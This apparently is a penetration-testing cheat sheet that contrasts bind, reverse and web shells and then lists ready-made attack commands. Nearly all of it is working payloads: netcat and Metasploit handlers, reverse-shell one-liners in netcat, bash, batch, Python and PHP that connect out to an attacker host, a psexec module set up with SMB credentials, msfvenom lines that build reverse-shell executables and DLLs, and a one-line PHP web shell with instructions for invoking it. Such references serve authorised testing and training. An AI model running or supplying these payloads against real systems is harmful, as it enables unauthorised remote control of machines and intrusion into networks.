Reverse vs Bind vs Web Shell
Bind Shell
The code is used to start a listener attached to a shell on the target. Then we can connect to the port to obtain remote code execution. This has the advantage of not requiring any configuration on our network, but may be prevented by firewalls protecting the target.
Reverse Shell
The code makes the target to connects back to the attacker computer. Reverse shells are a good way to bypass firewalls. The drawback is that we need to configure our network to accept the shell: we need to set up an handler.
Web Shell
The code allows the attacker to send shell commands to the target server via a web page hosted on this server.
Handlers
NETCAT
nc -lvnp [ATTACKER_PORT]Open a listener on delected port.
METASPLOIT
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcpHandler for linux (efl) reverse shell.
Reverse Shell
Ressources
PayloadsAllTheThings Reverse Shell Cheat Sheet
Pentestmonkey Reverse Shell Cheat Sheet
NETCAT
nc -e /bin/bash [ATTACKER_IP] [ATTACKER_PORT]Reverse shell.
BASH
bash -i >& /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1Reverse Shell.
BAT
@echo off nc.exe [ATTACKER_IP] [ATTACKER_PORT] -e cmd.exeReverse Shell.
PYTHON
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ATTACKER_IP]",[ATTACKER_PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'Reverse Shell.
PHP
<?phpexec("/bin/bash -c 'bash -i > /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1'");?>Very simple reverse shell.
Fancy reverse shell: Pentestmonkey PHP Reverse Shell Location on Kali: /usr/share/webshells/php/php-reverse-shell.php
METASPLOIT
use exploit/windows/smb/psexec
set lhost [ATTACKER_IP]set rhosts [TARGET_IP]set smbdomain [TARGET_DOMAIN]set smbuser [TARGET_USER]set smbpass [TARGET_IP]set payload windows/x64/meterpreter/reverse_tcpCreate a reverse shell from a SMB share.
MSVENOM (Reverse Shell Generator)
msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_OP] LPORT=[ATTACKER_PORT]Generate a Linux reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exeGenerate a reverse shell exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exeGenerate a meterpreter reverse shell exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f dll -o shell.dllGenerate a meterpreter reverse shell DLL.
Web Shell
PHP
<?phpsystem($_GET["cmd"]);?>Web shell. After upload, go to http://[TARGET_IP]/myWebShell.php?cmd=whoami